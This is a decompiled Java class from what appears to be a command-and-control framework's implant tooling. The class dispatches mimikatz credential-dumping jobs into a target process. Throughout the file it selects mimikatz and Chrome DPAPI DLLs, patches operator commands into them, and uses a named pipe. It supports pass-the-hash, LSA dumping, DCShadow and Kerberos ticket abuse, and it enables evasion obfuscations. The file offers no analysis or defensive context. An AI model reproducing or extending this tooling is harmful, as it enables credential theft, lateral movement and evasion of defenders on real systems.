/*
 * Decompiled with CFR 0.152.
 */
package beacon.jobs;

import beacon.Job;
import beacon.TaskBeacon;
import beacon.jobs.PostExJobs;
import common.CommonUtils;
import common.Packer;
import pe.PostExObfuscator;

public class MimikatzJob
extends Job {
    protected String commandz;

    public MimikatzJob(TaskBeacon taskBeacon, String string) {
        super(taskBeacon);
        this.commandz = string;
    }

    @Override
    public String getDescription() {
        StringBuilder stringBuilder = new StringBuilder();
        stringBuilder.append("Tasked beacon to run mimikatz's ").append(this.commandz).append(" command");
        if (this.isInject()) {
            stringBuilder.append(" into ").append(this.pid).append(" (").append(this.arch).append(")");
        }
        return stringBuilder.toString();
    }

    @Override
    public String getShortDescription() {
        return "mimikatz " + this.commandz.split(" ")[0];
    }

    @Override
    public String getDLLName() {
        if (CommonUtils.isin("dpapi::chrome", this.commandz)) {
            return this.getDLLNameChrome();
        }
        return this.getDLLNameNormal();
    }

    @Override
    public byte[] getDLLContent() {
        String string = this.tasker.getMimikatzDLL(this.getDLLName(), this.commandz);
        if (string == null) {
            return super.getDLLContent();
        }
        CommonUtils.print_stat("Using external mimikatz file '" + string + "' for " + this.commandz.split(" ")[0]);
        return CommonUtils.readFile(string);
    }

    public String getDLLNameNormal() {
        if (this.arch.equals("x64")) {
            return "resources/mimikatz-full.x64.dll";
        }
        return "resources/mimikatz-full.x86.dll";
    }

    public String getDLLNameChrome() {
        if (this.arch.equals("x64")) {
            return "resources/mimikatz-chrome.x64.dll";
        }
        return "resources/mimikatz-chrome.x86.dll";
    }

    @Override
    public int getJobType() {
        if (this.commandz.startsWith("@")) {
            return 62;
        }
        return 40;
    }

    @Override
    public String getPipeName() {
        return "PIPEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
    }

    @Override
    public int getCallbackType() {
        return this.callBackFunction == null ? 32 : 40;
    }

    @Override
    public int getWaitTime() {
        return 15000;
    }

    @Override
    public String getJobName() {
        return PostExJobs.MIMIKATZ.getJobName();
    }

    private String A(String string) {
        StringBuffer stringBuffer = new StringBuffer(string.length());
        for (int i = 0; i < string.length(); ++i) {
            char c = string.charAt(i);
            if (c == '\\') {
                char c2 = string.charAt(i + 1);
                if (c2 == ';') {
                    stringBuffer.append(c2);
                    ++i;
                    continue;
                }
                stringBuffer.append(c);
                continue;
            }
            if (c == ';') {
                stringBuffer.append('\n');
                continue;
            }
            stringBuffer.append(c);
        }
        return stringBuffer.toString().replaceAll(" *\n *", "\n");
    }

    @Override
    public byte[] fix(byte[] byArray) {
        Packer packer = new Packer();
        packer.addStringUTF8(this.A(this.commandz), 512);
        byArray = CommonUtils.patch(byArray, "MIMIKATZ ABCDEFGHIJKLMNOPQRSTUVWXYZ", CommonUtils.bString(packer.getBytes()));
        return byArray;
    }

    @Override
    public String getTactic() {
        if (CommonUtils.isin("lsadump::dcshadow", this.commandz)) {
            return "T1207";
        }
        if (CommonUtils.isin("sekurlsa::pth", this.commandz)) {
            return "T1075";
        }
        if (CommonUtils.isin("lsadump::", this.commandz)) {
            return "T1003";
        }
        if (CommonUtils.isin("kerberos::", this.commandz)) {
            return "T1097";
        }
        if (CommonUtils.isin("sekurlsa::", this.commandz)) {
            return "T1003, T1055";
        }
        if (CommonUtils.isin("sid::", this.commandz)) {
            return "T1178";
        }
        return "";
    }

    @Override
    public void additionalObfuscations(PostExObfuscator postExObfuscator, byte[] byArray) {
        postExObfuscator.enableEvasions();
    }
}

